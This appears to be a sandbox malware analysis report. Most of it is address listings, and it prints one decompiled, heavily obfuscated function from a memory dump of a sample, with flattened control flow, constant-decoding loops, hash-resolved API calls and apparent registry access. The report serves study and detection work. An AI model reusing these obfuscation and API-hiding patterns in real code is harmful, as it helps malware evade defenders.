                                                                                                                                                        0x012d1854
                                                                                                                                                        0x012d1e93
                                                                                                                                                        0x012d1e9b
                                                                                                                                                        0x012d1ea3
                                                                                                                                                        0x012d1ea8
                                                                                                                                                        0x012d1eb0
                                                                                                                                                        0x012d185a
                                                                                                                                                        0x012d185f
                                                                                                                                                        0x012d186d
                                                                                                                                                        0x012d187c
                                                                                                                                                        0x012d1882
                                                                                                                                                        0x012d1888
                                                                                                                                                        0x012d188d
                                                                                                                                                        0x012d1893
                                                                                                                                                        0x012d1895
                                                                                                                                                        0x012d18aa
                                                                                                                                                        0x012d18aa
                                                                                                                                                        0x012d185f
                                                                                                                                                        0x012d1854
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1849
                                                                                                                                                        0x012d16a7
                                                                                                                                                        0x012d1a16
                                                                                                                                                        0x012d2069
                                                                                                                                                        0x012d206f
                                                                                                                                                        0x012d2075
                                                                                                                                                        0x012d207a
                                                                                                                                                        0x012d2080
                                                                                                                                                        0x012d2082
                                                                                                                                                        0x012d1a1c
                                                                                                                                                        0x012d1a21
                                                                                                                                                        0x012d208c
                                                                                                                                                        0x012d2094
                                                                                                                                                        0x012d20a1
                                                                                                                                                        0x012d20ad
                                                                                                                                                        0x012d20b1
                                                                                                                                                        0x012d20b9
                                                                                                                                                        0x012d20c1
                                                                                                                                                        0x012d1a27
                                                                                                                                                        0x012d1a2c
                                                                                                                                                        0x012d1a41
                                                                                                                                                        0x012d1a47
                                                                                                                                                        0x012d1a4d
                                                                                                                                                        0x012d1a54
                                                                                                                                                        0x012d1a59
                                                                                                                                                        0x012d1a61
                                                                                                                                                        0x012d1a66
                                                                                                                                                        0x012d1a6c
                                                                                                                                                        0x012d1a6f
                                                                                                                                                        0x012d1a71
                                                                                                                                                        0x012d1a8b
                                                                                                                                                        0x012d1a8b
                                                                                                                                                        0x012d1a2c
                                                                                                                                                        0x012d1a21
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1a16
                                                                                                                                                        0x012d16b2
                                                                                                                                                        0x012d237e
                                                                                                                                                        0x012d23ad
                                                                                                                                                        0x012d23ad
                                                                                                                                                        0x012d16bd
                                                                                                                                                        0x012d1d7c
                                                                                                                                                        0x012d1d83
                                                                                                                                                        0x012d1d88
                                                                                                                                                        0x012d1d97
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1d97
                                                                                                                                                        0x012d16c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d16ce
                                                                                                                                                        0x012d16ce
                                                                                                                                                        0x012d16d7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d16d7
                                                                                                                                                        0x012d16c8
                                                                                                                                                        0x012d15a2
                                                                                                                                                        0x012d172f
                                                                                                                                                        0x012d1b26
                                                                                                                                                        0x012d1c27
                                                                                                                                                        0x012d1c2b
                                                                                                                                                        0x012d1c2f
                                                                                                                                                        0x012d1c34
                                                                                                                                                        0x012d1c40
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1c40
                                                                                                                                                        0x012d1b31
                                                                                                                                                        0x012d21a8
                                                                                                                                                        0x012d21a8
                                                                                                                                                        0x012d21b0
                                                                                                                                                        0x012d21b8
                                                                                                                                                        0x012d21cf
                                                                                                                                                        0x012d21d5
                                                                                                                                                        0x012d21db
                                                                                                                                                        0x012d21e0
                                                                                                                                                        0x012d21e8
                                                                                                                                                        0x012d2203
                                                                                                                                                        0x012d1b37
                                                                                                                                                        0x012d1b3c
                                                                                                                                                        0x012d1b42
                                                                                                                                                        0x012d1b4e
                                                                                                                                                        0x012d1b59
                                                                                                                                                        0x012d1b64
                                                                                                                                                        0x012d1b64
                                                                                                                                                        0x012d1b3c
                                                                                                                                                        0x012d1735
                                                                                                                                                        0x012d173a
                                                                                                                                                        0x012d1dfd
                                                                                                                                                        0x012d1740
                                                                                                                                                        0x012d1745
                                                                                                                                                        0x012d1e05
                                                                                                                                                        0x012d1e12
                                                                                                                                                        0x012d1e18
                                                                                                                                                        0x012d1e29
                                                                                                                                                        0x012d174b
                                                                                                                                                        0x012d1750
                                                                                                                                                        0x012d175a
                                                                                                                                                        0x012d1768
                                                                                                                                                        0x012d176e
                                                                                                                                                        0x012d1774
                                                                                                                                                        0x012d1781
                                                                                                                                                        0x012d178a
                                                                                                                                                        0x012d1790
                                                                                                                                                        0x012d1796
                                                                                                                                                        0x012d17a3
                                                                                                                                                        0x012d17ac
                                                                                                                                                        0x012d17b2
                                                                                                                                                        0x012d17b8
                                                                                                                                                        0x012d17bd
                                                                                                                                                        0x012d17c5
                                                                                                                                                        0x012d17d6
                                                                                                                                                        0x012d17d6
                                                                                                                                                        0x012d1750
                                                                                                                                                        0x012d1745
                                                                                                                                                        0x012d173a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d172f
                                                                                                                                                        0x012d15ad
                                                                                                                                                        0x012d1942
                                                                                                                                                        0x012d1f61
                                                                                                                                                        0x012d1f6d
                                                                                                                                                        0x012d1f7b
                                                                                                                                                        0x012d1f89
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1f89
                                                                                                                                                        0x012d194d
                                                                                                                                                        0x012d1f95
                                                                                                                                                        0x012d1fa4
                                                                                                                                                        0x012d1fb0
                                                                                                                                                        0x012d1fb8
                                                                                                                                                        0x012d1fc7
                                                                                                                                                        0x012d1feb
                                                                                                                                                        0x012d1ff7
                                                                                                                                                        0x012d1ffe
                                                                                                                                                        0x012d2003
                                                                                                                                                        0x012d200b
                                                                                                                                                        0x012d2013
                                                                                                                                                        0x012d2024
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2024
                                                                                                                                                        0x012d1958
                                                                                                                                                        0x012d195e
                                                                                                                                                        0x012d1963
                                                                                                                                                        0x012d196b
                                                                                                                                                        0x012d1973
                                                                                                                                                        0x012d197d
                                                                                                                                                        0x012d1cf9
                                                                                                                                                        0x012d1cfb
                                                                                                                                                        0x012d1cfb
                                                                                                                                                        0x012d15b3
                                                                                                                                                        0x012d15b8
                                                                                                                                                        0x012d1c4e
                                                                                                                                                        0x012d2327
                                                                                                                                                        0x012d2330
                                                                                                                                                        0x012d233b
                                                                                                                                                        0x012d2346
                                                                                                                                                        0x012d1c54
                                                                                                                                                        0x012d1c59
                                                                                                                                                        0x012d1c63
                                                                                                                                                        0x012d1c7e
                                                                                                                                                        0x012d1c7e
                                                                                                                                                        0x012d1c59
                                                                                                                                                        0x012d15be
                                                                                                                                                        0x012d15c3
                                                                                                                                                        0x012d1d08
                                                                                                                                                        0x012d1d0d
                                                                                                                                                        0x012d1d1d
                                                                                                                                                        0x012d1d25
                                                                                                                                                        0x012d15c9
                                                                                                                                                        0x012d15ce
                                                                                                                                                        0x012d15d8
                                                                                                                                                        0x012d15dc
                                                                                                                                                        0x012d15dc
                                                                                                                                                        0x012d15ce
                                                                                                                                                        0x012d15c3
                                                                                                                                                        0x012d15b8
                                                                                                                                                        0x012d15ad
                                                                                                                                                        0x012d15e8
                                                                                                                                                        0x012d16e6
                                                                                                                                                        0x012d18b7
                                                                                                                                                        0x012d1c0b
                                                                                                                                                        0x012d22d1
                                                                                                                                                        0x012d22da
                                                                                                                                                        0x012d22e5
                                                                                                                                                        0x012d22f0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d22f0
                                                                                                                                                        0x012d1c16
                                                                                                                                                        0x012d2300
                                                                                                                                                        0x012d2307
                                                                                                                                                        0x012d230c
                                                                                                                                                        0x012d231b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d231b
                                                                                                                                                        0x012d1c21
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d18bd
                                                                                                                                                        0x012d18c2
                                                                                                                                                        0x012d1ebd
                                                                                                                                                        0x012d1ebd
                                                                                                                                                        0x012d1ec5
                                                                                                                                                        0x012d1ed7
                                                                                                                                                        0x012d1ede
                                                                                                                                                        0x012d1ee6
                                                                                                                                                        0x012d1eee
                                                                                                                                                        0x012d1ef6
                                                                                                                                                        0x012d1f09
                                                                                                                                                        0x012d1f0f
                                                                                                                                                        0x012d1f15
                                                                                                                                                        0x012d1f1f
                                                                                                                                                        0x012d1f22
                                                                                                                                                        0x012d1f2b
                                                                                                                                                        0x012d1f3a
                                                                                                                                                        0x012d18c8
                                                                                                                                                        0x012d18cd
                                                                                                                                                        0x012d1f45
                                                                                                                                                        0x012d1f59
                                                                                                                                                        0x012d18d3
                                                                                                                                                        0x012d18d8
                                                                                                                                                        0x012d18f4
                                                                                                                                                        0x012d18fa
                                                                                                                                                        0x012d1900
                                                                                                                                                        0x012d1905
                                                                                                                                                        0x012d190a
                                                                                                                                                        0x012d1912
                                                                                                                                                        0x012d1915
                                                                                                                                                        0x012d1918
                                                                                                                                                        0x012d191a
                                                                                                                                                        0x012d1935
                                                                                                                                                        0x012d1935
                                                                                                                                                        0x012d18d8
                                                                                                                                                        0x012d18cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d18c2
                                                                                                                                                        0x012d18b7
                                                                                                                                                        0x012d16f1
                                                                                                                                                        0x012d1a98
                                                                                                                                                        0x012d20d7
                                                                                                                                                        0x012d20de
                                                                                                                                                        0x012d20e7
                                                                                                                                                        0x012d20f8
                                                                                                                                                        0x012d20fa
                                                                                                                                                        0x012d20ff
                                                                                                                                                        0x012d2107
                                                                                                                                                        0x012d2116
                                                                                                                                                        0x012d2128
                                                                                                                                                        0x012d212b
                                                                                                                                                        0x012d2133
                                                                                                                                                        0x012d213b
                                                                                                                                                        0x012d2140
                                                                                                                                                        0x012d214b
                                                                                                                                                        0x012d1a9e
                                                                                                                                                        0x012d1aa3
                                                                                                                                                        0x012d2163
                                                                                                                                                        0x012d216f
                                                                                                                                                        0x012d217a
                                                                                                                                                        0x012d2189
                                                                                                                                                        0x012d2190
                                                                                                                                                        0x012d219c
                                                                                                                                                        0x012d1aa9
                                                                                                                                                        0x012d1aae
                                                                                                                                                        0x012d1abc
                                                                                                                                                        0x012d1acf
                                                                                                                                                        0x012d1ae3
                                                                                                                                                        0x012d1af3
                                                                                                                                                        0x012d1afb
                                                                                                                                                        0x012d1b19
                                                                                                                                                        0x012d1b19
                                                                                                                                                        0x012d1aae
                                                                                                                                                        0x012d1aa3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1a98
                                                                                                                                                        0x012d16fc
                                                                                                                                                        0x012d1daa
                                                                                                                                                        0x012d1db8
                                                                                                                                                        0x012d1dd1
                                                                                                                                                        0x012d1ddb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1ddb
                                                                                                                                                        0x012d1707
                                                                                                                                                        0x012d1cd8
                                                                                                                                                        0x012d1cd8
                                                                                                                                                        0x012d1cdd
                                                                                                                                                        0x012d1ce7
                                                                                                                                                        0x012d1cf1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1cf1
                                                                                                                                                        0x012d1712
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1718
                                                                                                                                                        0x012d1718
                                                                                                                                                        0x012d171d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d171d
                                                                                                                                                        0x012d1712
                                                                                                                                                        0x012d15f3
                                                                                                                                                        0x012d17e3
                                                                                                                                                        0x012d1b72
                                                                                                                                                        0x012d220b
                                                                                                                                                        0x012d2213
                                                                                                                                                        0x012d2222
                                                                                                                                                        0x012d222d
                                                                                                                                                        0x012d2231
                                                                                                                                                        0x012d223f
                                                                                                                                                        0x012d2250
                                                                                                                                                        0x012d2257
                                                                                                                                                        0x012d1b78
                                                                                                                                                        0x012d1b7d
                                                                                                                                                        0x012d2263
                                                                                                                                                        0x012d2281
                                                                                                                                                        0x012d1b83
                                                                                                                                                        0x012d1b88
                                                                                                                                                        0x012d1b8e
                                                                                                                                                        0x012d1b96
                                                                                                                                                        0x012d1b9e
                                                                                                                                                        0x012d1ba3
                                                                                                                                                        0x012d1bab
                                                                                                                                                        0x012d1bab
                                                                                                                                                        0x012d1b88
                                                                                                                                                        0x012d1b7d
                                                                                                                                                        0x012d17e9
                                                                                                                                                        0x012d17ee
                                                                                                                                                        0x012d1e31
                                                                                                                                                        0x012d1e36
                                                                                                                                                        0x012d1e3e
                                                                                                                                                        0x012d1e43
                                                                                                                                                        0x012d17f4
                                                                                                                                                        0x012d17f9
                                                                                                                                                        0x012d1e58
                                                                                                                                                        0x012d1e5c
                                                                                                                                                        0x012d17ff
                                                                                                                                                        0x012d1804
                                                                                                                                                        0x012d1819
                                                                                                                                                        0x012d181f
                                                                                                                                                        0x012d1825
                                                                                                                                                        0x012d182a
                                                                                                                                                        0x012d182d
                                                                                                                                                        0x012d182f
                                                                                                                                                        0x012d182f
                                                                                                                                                        0x012d1804
                                                                                                                                                        0x012d17f9
                                                                                                                                                        0x012d17ee
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d17e3
                                                                                                                                                        0x012d15fe
                                                                                                                                                        0x012d198f
                                                                                                                                                        0x012d2358
                                                                                                                                                        0x012d235c
                                                                                                                                                        0x012d2361
                                                                                                                                                        0x012d236d
                                                                                                                                                        0x012d1995
                                                                                                                                                        0x012d199a
                                                                                                                                                        0x012d2030
                                                                                                                                                        0x012d2037
                                                                                                                                                        0x012d203c
                                                                                                                                                        0x012d204b
                                                                                                                                                        0x012d19a0
                                                                                                                                                        0x012d19a5
                                                                                                                                                        0x012d19b8
                                                                                                                                                        0x012d19be
                                                                                                                                                        0x012d19c3
                                                                                                                                                        0x012d19ca
                                                                                                                                                        0x012d19d6
                                                                                                                                                        0x012d19dc
                                                                                                                                                        0x012d19e2
                                                                                                                                                        0x012d19ec
                                                                                                                                                        0x012d19ef
                                                                                                                                                        0x012d19fa
                                                                                                                                                        0x012d1a09
                                                                                                                                                        0x012d1a09
                                                                                                                                                        0x012d19a5
                                                                                                                                                        0x012d199a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d198f
                                                                                                                                                        0x012d1609
                                                                                                                                                        0x012d1c8b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d1c92
                                                                                                                                                        0x012d1c9f
                                                                                                                                                        0x012d1ca5
                                                                                                                                                        0x012d1cab
                                                                                                                                                        0x012d1cb0
                                                                                                                                                        0x012d1cb3
                                                                                                                                                        0x012d1cb5
                                                                                                                                                        0x012d1cd0
                                                                                                                                                        0x012d1cd0
                                                                                                                                                        0x012d160f
                                                                                                                                                        0x012d1614
                                                                                                                                                        0x012d1d35
                                                                                                                                                        0x012d1d44
                                                                                                                                                        0x012d1d4a
                                                                                                                                                        0x012d1d50
                                                                                                                                                        0x012d1d55
                                                                                                                                                        0x012d1d5b
                                                                                                                                                        0x012d1d61
                                                                                                                                                        0x012d1d70
                                                                                                                                                        0x012d161a
                                                                                                                                                        0x012d161f
                                                                                                                                                        0x012d1634
                                                                                                                                                        0x012d163a
                                                                                                                                                        0x012d1640
                                                                                                                                                        0x012d1645
                                                                                                                                                        0x012d164e
                                                                                                                                                        0x012d1656
                                                                                                                                                        0x012d165e
                                                                                                                                                        0x012d1666
                                                                                                                                                        0x012d166c
                                                                                                                                                        0x012d166f
                                                                                                                                                        0x012d1671
                                                                                                                                                        0x012d1679
                                                                                                                                                        0x012d168f
                                                                                                                                                        0x012d168f
                                                                                                                                                        0x012d161f
                                                                                                                                                        0x012d1614
                                                                                                                                                        0x012d1609
                                                                                                                                                        0x012d158b
                                                                                                                                                        0x012d158b

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 5(i9$5(i9$Wl '$Wl '$"^o$"^o$N3k$N3k
                                                                                                                                                        • API String ID: 0-771958118
                                                                                                                                                        • Opcode ID: 38fc96213443c8a49af872921676e21426b410e956720a2d0b1bd43d4c2233ee
                                                                                                                                                        • Instruction ID: 0e8c9228d6615c49cf77f9eac7854edcbcb5a007897a8dfe6dd3928d15b2b22d
                                                                                                                                                        • Opcode Fuzzy Hash: 38fc96213443c8a49af872921676e21426b410e956720a2d0b1bd43d4c2233ee
                                                                                                                                                        • Instruction Fuzzy Hash: 1C624C7262C6C58ADB748B59F4907AEB7A1E3C8780F54401ADB8AC7F58DB3DC8918F41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B31A0, Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                        • Opcode ID: 31669b5bb333a9c36f51370141e400dcfa43fc223199287eeb8d2431e9fda4e2
                                                                                                                                                        • Instruction ID: 6e51cd431b418e076270d3930a828447661e906ce71b7b95a3e012021cad0877
                                                                                                                                                        • Opcode Fuzzy Hash: 31669b5bb333a9c36f51370141e400dcfa43fc223199287eeb8d2431e9fda4e2
                                                                                                                                                        • Instruction Fuzzy Hash: 36315E72708F81C6DB60CF65E8506AE73A4FB88798F500135EA9D43B98EF38D565CB01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D7F12, Relevance: 7.7, Strings: 6, Instructions: 218COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 46%
                                                                                                                                                        			E012D7F12(intOrPtr __rax, void* __rcx, long long __rdx, long long __r9) {
				void* _t54;
				void* _t102;
				void* _t103;
				intOrPtr _t120;
				signed long long _t121;
				void* _t126;
				intOrPtr _t129;
				intOrPtr* _t132;
				intOrPtr _t137;
				long long _t139;
				void* _t140;
				void* _t143;

				_t146 = __r9;
				_t126 = __rcx;
				_t120 = __rax;
				 *((long long*)(_t143 + 0x70)) = __r9;
				 *((intOrPtr*)(_t143 + 0x54)) = r8d;
				 *((long long*)(_t143 + 0x68)) = __rdx;
				_t140 = __rcx;
				E012DCDB9(0xc8, __rax);
				_t137 = _t120;
				_t139 = _t143 + 0x48;
				 *((long long*)(_t143 + 0x58)) = _t139;
				_t121 =  *((intOrPtr*)(_t143 + 0x58));
				 *((long long*)(_t143 + 0x60)) = _t140 + 0xb44;
				_t132 = _t143 + 0x3c;
				 *((char*)(_t132 - 4)) = 0;
				 *_t132 = 0x5cdaad3d;
				 *((intOrPtr*)(_t132 + 4)) = 0x4dcea319;
				 *((intOrPtr*)(_t132 + 8)) = 0x28cfe732;
				if( *((intOrPtr*)(_t132 - 4)) != 0) {
					L3:
					E012E020E(_t121, _t137, _t132,  *((intOrPtr*)(_t143 + 0x60)), _t146);
					r15d = 0;
					r8d = 0x6e0c8ed2;
					r9d = 0xd6;
					E012DFAD7(2, _t103, _t121, _t137);
					 *((long long*)(_t143 + 0x20)) = _t139;
					r8d = 0;
					r9d = 2;
					 *((intOrPtr*)(_t143 + 0x34)) =  *_t121();
					_t129 = _t137;
					E012DCC2E(_t121, _t129);
					_t54 = 0x35b33ba9;
					r14d = 0xbe799bd5;
					r12b = 0xff;
					L4:
					while(1) {
						while(_t54 > 0xbe799bd4) {
							if(_t54 <= 0x35b33ba8) {
								if(_t54 == 0xbe799bd5) {
									r8d = 0xd31a9c34;
									r9d = 0xe3;
									E012DFAD7(2, _t103, _t121, _t129);
									 *((intOrPtr*)(_t143 + 0x28)) =  *((intOrPtr*)(_t143 + 0x54));
									 *((long long*)(_t143 + 0x20)) =  *((intOrPtr*)(_t143 + 0x68));
									_t129 =  *((intOrPtr*)(_t143 + 0x48));
									r8d = 0;
									r9d = 3;
									 *_t121();
									_t54 =  ==  ? 0x319663b5 : 0x8c530be3;
									r13b = 1;
									continue;
								}
								if(_t54 == 0x319663b5) {
									r8d = 0x96bc22d6;
									r9d = 0xe0;
									E012DFAD7(2, _t103, _t121, _t129);
									_t129 =  *((intOrPtr*)(_t143 + 0x48));
									 *_t121();
									dil = (r13d ^ r12b | 0x000000fe) != r12b;
									_t54 = 0x2f3a4258;
									continue;
								}
								if(_t54 != 0x2f3a4258) {
									continue;
								}
								dil = dil & 0x00000001;
								return _t102;
							}
							if(_t54 == 0x4ed03b9e) {
								 *((intOrPtr*)(_t143 + 0x38)) = r15b;
								 *((intOrPtr*)(_t143 + 0x3c)) = 0x74e6ac90;
								 *((intOrPtr*)(_t143 + 0x40)) = 0x65f2a2b4;
								 *((intOrPtr*)(_t143 + 0x44)) = 0x80c3c3;
								if( *((intOrPtr*)(_t143 + 0x38)) != r15b) {
									L25:
									r8d = 0x6e0c8ed2;
									r9d = 0xd6;
									E012DFAD7(2, _t103, _t121, _t129);
									 *((long long*)(_t143 + 0x20)) = _t139;
									_t129 = 0x80000001;
									r8d = 0;
									r9d = 4;
									 *_t121();
									_t54 =  ==  ? 0x8d7de328 : 0x4aea2376;
									continue;
								}
								do {
									 *(_t143 + 0x38 + _t121 * 4) =  *(_t143 + 0x38 + _t121 * 4) & 0xff7f3c3c |  !( *(_t143 + 0x38 + _t121 * 4)) & 0x0080c3c3;
									_t129 = _t129 + 1;
									_t121 = _t121 + 1;
								} while (_t121 != 4);
								goto L25;
							}
							if(_t54 == 0x4aea2376) {
								L14:
								_t54 = 0x2f3a4258;
								_t102 = 0;
								continue;
							}
							if(_t54 == 0x35b33ba9) {
								_t54 =  ==  ? 0x4ed03b9e : 0xa3242dbf;
							}
						}
						if(_t54 <= 0xa3242dbe) {
							if(_t54 == 0x8c530be3) {
								_t54 = 0x319663b5;
								r13d = 0;
							} else {
								if(_t54 == 0x8d7de328) {
									r8d = 0x6a44d3e0;
									r9d = 0xf4;
									E012DFAD7(2, _t103, _t121, _t129);
									_t129 =  *((intOrPtr*)(_t143 + 0x48));
									 *_t121();
									_t54 =  ==  ? r14d : 0xa4222be1;
								}
							}
							continue;
						}
						if(_t54 == 0xa3242dbf) {
							_t54 =  ==  ? r14d : 0xa726d101;
							continue;
						}
						if(_t54 == 0xa4222be1) {
							_t102 = 0;
							r8d = 0x96bc22d6;
							r9d = 0xe0;
							E012DFAD7(2, _t103, _t121, _t129);
							_t129 =  *((intOrPtr*)(_t143 + 0x48));
							 *_t121();
							_t54 = 0x2f3a4258;
							continue;
						}
						if(_t54 != 0xa726d101) {
							continue;
						}
						goto L14;
					}
				} else {
					do {
						 *(_t143 + 0x38 + _t121 * 4) =  *(_t143 + 0x38 + _t121 * 4) & 0xd7433d91 |  !( *(_t143 + 0x38 + _t121 * 4)) & 0x28bcc26e;
						_t126 = _t126 + 1;
						_t121 = _t121 + 1;
					} while (_t121 != 4);
					goto L3;
				}
			}















                                                                                                                                                        0x012d7f12
                                                                                                                                                        0x012d7f12
                                                                                                                                                        0x012d7f12
                                                                                                                                                        0x012d7f22
                                                                                                                                                        0x012d7f27
                                                                                                                                                        0x012d7f2c
                                                                                                                                                        0x012d7f31
                                                                                                                                                        0x012d7f39
                                                                                                                                                        0x012d7f3e
                                                                                                                                                        0x012d7f41
                                                                                                                                                        0x012d7f46
                                                                                                                                                        0x012d7f4b
                                                                                                                                                        0x012d7f57
                                                                                                                                                        0x012d7f5e
                                                                                                                                                        0x012d7f63
                                                                                                                                                        0x012d7f66
                                                                                                                                                        0x012d7f6c
                                                                                                                                                        0x012d7f73
                                                                                                                                                        0x012d7f7d
                                                                                                                                                        0x012d7fac
                                                                                                                                                        0x012d7fb4
                                                                                                                                                        0x012d7fb9
                                                                                                                                                        0x012d7fc3
                                                                                                                                                        0x012d7fc9
                                                                                                                                                        0x012d7fcf
                                                                                                                                                        0x012d7fd4
                                                                                                                                                        0x012d7fe3
                                                                                                                                                        0x012d7fe6
                                                                                                                                                        0x012d7fee
                                                                                                                                                        0x012d7ff2
                                                                                                                                                        0x012d7ff5
                                                                                                                                                        0x012d7ffa
                                                                                                                                                        0x012d7fff
                                                                                                                                                        0x012d8005
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8008
                                                                                                                                                        0x012d8008
                                                                                                                                                        0x012d8014
                                                                                                                                                        0x012d8077
                                                                                                                                                        0x012d81d1
                                                                                                                                                        0x012d81d7
                                                                                                                                                        0x012d81dd
                                                                                                                                                        0x012d81e6
                                                                                                                                                        0x012d81ef
                                                                                                                                                        0x012d81f4
                                                                                                                                                        0x012d81fc
                                                                                                                                                        0x012d81ff
                                                                                                                                                        0x012d8205
                                                                                                                                                        0x012d8213
                                                                                                                                                        0x012d8216
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8216
                                                                                                                                                        0x012d8082
                                                                                                                                                        0x012d822a
                                                                                                                                                        0x012d8230
                                                                                                                                                        0x012d8236
                                                                                                                                                        0x012d823b
                                                                                                                                                        0x012d823e
                                                                                                                                                        0x012d824b
                                                                                                                                                        0x012d824f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d824f
                                                                                                                                                        0x012d808d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d826b
                                                                                                                                                        0x012d8281
                                                                                                                                                        0x012d8281
                                                                                                                                                        0x012d801b
                                                                                                                                                        0x012d80eb
                                                                                                                                                        0x012d80f0
                                                                                                                                                        0x012d80f8
                                                                                                                                                        0x012d8100
                                                                                                                                                        0x012d810d
                                                                                                                                                        0x012d813c
                                                                                                                                                        0x012d8143
                                                                                                                                                        0x012d8149
                                                                                                                                                        0x012d814f
                                                                                                                                                        0x012d8154
                                                                                                                                                        0x012d8159
                                                                                                                                                        0x012d8165
                                                                                                                                                        0x012d8168
                                                                                                                                                        0x012d816e
                                                                                                                                                        0x012d817c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d817c
                                                                                                                                                        0x012d8116
                                                                                                                                                        0x012d812c
                                                                                                                                                        0x012d8130
                                                                                                                                                        0x012d8133
                                                                                                                                                        0x012d8136
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8116
                                                                                                                                                        0x012d8026
                                                                                                                                                        0x012d8069
                                                                                                                                                        0x012d8069
                                                                                                                                                        0x012d806e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d806e
                                                                                                                                                        0x012d802d
                                                                                                                                                        0x012d8040
                                                                                                                                                        0x012d8040
                                                                                                                                                        0x012d802d
                                                                                                                                                        0x012d804a
                                                                                                                                                        0x012d809d
                                                                                                                                                        0x012d8259
                                                                                                                                                        0x012d825e
                                                                                                                                                        0x012d80a3
                                                                                                                                                        0x012d80a8
                                                                                                                                                        0x012d80bf
                                                                                                                                                        0x012d80c5
                                                                                                                                                        0x012d80cb
                                                                                                                                                        0x012d80d0
                                                                                                                                                        0x012d80d9
                                                                                                                                                        0x012d80e2
                                                                                                                                                        0x012d80e2
                                                                                                                                                        0x012d80a8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d809d
                                                                                                                                                        0x012d8051
                                                                                                                                                        0x012d818e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d818e
                                                                                                                                                        0x012d805c
                                                                                                                                                        0x012d819c
                                                                                                                                                        0x012d81a5
                                                                                                                                                        0x012d81ab
                                                                                                                                                        0x012d81b1
                                                                                                                                                        0x012d81b6
                                                                                                                                                        0x012d81b9
                                                                                                                                                        0x012d81bb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d81bb
                                                                                                                                                        0x012d8067
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d8067
                                                                                                                                                        0x012d7f7f
                                                                                                                                                        0x012d7f86
                                                                                                                                                        0x012d7f9c
                                                                                                                                                        0x012d7fa0
                                                                                                                                                        0x012d7fa3
                                                                                                                                                        0x012d7fa6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7f86

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: XB:/$XB:/$XB:/$XB:/$v#J$v#J
                                                                                                                                                        • API String ID: 0-2458166928
                                                                                                                                                        • Opcode ID: ec541e7174414d4e89c205959fd04962df5884824a857730078020915900380e
